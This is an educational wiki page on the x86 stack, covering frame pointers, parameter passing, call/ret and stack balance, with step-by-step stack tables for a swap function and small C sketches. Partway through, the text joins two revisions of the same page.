At the beginning of most functions, space is allocated for local variables. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them based on their position on the stack. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece of the puzzle. Unless a program has been optimized, ebp is set to point at the beginning of the local variables. The reason for this is that throughout a function, the stack changes (due to saving variables, making function calls, and other reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it does not change during the function. <br />
<br />
Here is an example of a swap function that uses two parameters passed on the stack and two local variables to store the interim values (if you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been modified for simplicity; in reality, each address would increase by the size of the previous instruction):<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory - second parameter (param2)<br />
0x400001 push edx ; Another integer pointer - first parameter (param1)<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Balance the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put param1 (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put param2 (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [edx], edi ; Put the first value into the second address (*param2 = old *param1)<br />
0x40100e mov [ecx], esi ; Put the second value into the first address (*param1 = old *param2)<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
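<br />
For orientation, here is roughly what the swap function above would look like in C. This is a sketch written to match the commented assembly, not the original source: the local variable names <code>first</code> and <code>second</code> are made up, and the comments map each line to the stack slot the assembly uses.<br />

```c
/* Swap the integers that a and b point to, using two locals as in the assembly. */
void swap(int *a, int *b) {
    int first  = *a;  /* local at [ebp-4], loaded through param1 at [ebp+8] */
    int second = *b;  /* local at [ebp-8], loaded through param2 at [ebp+12] */

    *a = second;      /* second value goes into the first address */
    *b = first;       /* first value goes into the second address */
}
```

Calling <code>swap(&x, &y)</code> with x = 1 and y = 2 leaves x = 2 and y = 1. An optimizing compiler would most likely keep both values in registers and skip the stack locals entirely; they are kept here to match the unoptimized listing.<br />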
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how, in the following section, the variables are addressed relative to ebp. The first parameter is at ebp + 8, which is two values above ebp on the stack, and the second is at ebp + 12, which is three above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
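The offsets in the table can be checked with a little arithmetic. The sketch below is illustrative only: the helper names param_addr and local_addr are made up for this example, and it assumes 4-byte stack slots as on 32-bit x86.<br />

```c
#include <assert.h>
#include <stdint.h>

/* Address of the n-th stack parameter (n = 1, 2, ...) relative to ebp.
 * [ebp] holds the saved ebp and [ebp+4] the return address,
 * so the first parameter lives at ebp + 8. */
uint32_t param_addr(uint32_t ebp, uint32_t n)
{
    assert(n >= 1);
    return ebp + 4 + 4 * n;
}

/* Address of the n-th 4-byte local (n = 1, 2, ...), stored below ebp. */
uint32_t local_addr(uint32_t ebp, uint32_t n)
{
    assert(n >= 1);
    return ebp - 4 * n;
}
```

With a sample ebp of 0x1000, the two parameters land at 0x1008 and 0x100c, and the two locals at 0x0ffc and 0x0ff8, matching the ebp + 8, ebp + 12, ebp - 4, and ebp - 8 rows above.<br />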
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
0x40100d mov [ecx], esi ; Put the second value into the first address (*param1 = second value)<br />
0x40100e mov [edx], edi ; Put the first value into the second address (*param2 = first value)<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
0x400003 add esp, 8 ; Balance the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
By the time a function reaches its ret, the stack pointer should be back exactly where it was when the function was entered. In other words, every amount subtracted from the stack pointer (either by sub or push) ''has to be added back'' (either by add or pop). If it isn't, the return address won't be where ret expects it and the program will likely crash.<br />
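One way to convince yourself that the swap routine is balanced is to add up its stack adjustments. The following is a minimal sketch; the names swap_ops and esp_delta are invented for this example, and the table of adjustments is copied by hand from the walkthrough above.<br />

```c
#include <assert.h>
#include <stddef.h>

/* esp adjustments made by the swap routine, in program order. */
static const int swap_ops[] = {
    -4,  /* push ebp   */
    -8,  /* sub esp, 8 */
    -4,  /* push esi   */
    -4,  /* push edi   */
    +4,  /* pop edi    */
    +4,  /* pop esi    */
    +8,  /* add esp, 8 */
    +4   /* pop ebp    */
};

/* Net change to esp after applying every adjustment in ops. */
int esp_delta(const int *ops, size_t count)
{
    int delta = 0;
    for (size_t i = 0; i < count; i++) {
        delta += ops[i];
    }
    return delta;
}
```

A result of zero means ret will find the return address at the top of the stack. Dropping any one of the pops or the add leaves a non-zero total, which is exactly the situation that crashes a real program.<br />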
<br />
== Questions ==<br />
Feel free to edit this section and post questions; I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3136The Stack2012-01-15T23:40:43Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower addresses. The esp register always points to the lowest address currently in use on the stack. Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes below where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack pointer. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same five 32-bit stack slots are shown in all these examples; only the esp-relative labels in the left column change as the stack pointer moves. The stack extends much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and may be overwritten at any time (for example, by the next push or call).<br />
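The walkthrough above can be mimicked with a toy model in C. This is only a sketch under simplifying assumptions: the ToyStack type and its helper functions are invented for illustration, memory is an array of 32-bit words, and esp is an array index rather than a real address.<br />

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 16

/* A toy model of a 32-bit stack: memory is an array of words and
 * esp is an index that moves toward 0 as the stack grows. */
typedef struct {
    uint32_t mem[STACK_WORDS];
    int esp;              /* index of the current top of stack */
} ToyStack;

void toy_init(ToyStack *s)
{
    s->esp = STACK_WORDS; /* empty: esp sits just past the highest slot */
}

/* Like "push value": move esp down one word, then store. */
void toy_push(ToyStack *s, uint32_t value)
{
    assert(s->esp > 0);
    s->esp -= 1;
    s->mem[s->esp] = value;
}

/* Like "add esp, 4 * words": discards entries without erasing them. */
void toy_release(ToyStack *s, int words)
{
    assert(words >= 0 && s->esp + words <= STACK_WORDS);
    s->esp += words;
}
```

Pushing 3, 2, and 1 and then releasing three words puts esp back where it started, while the three values remain in memory below it, just as in the last table.<br />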
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
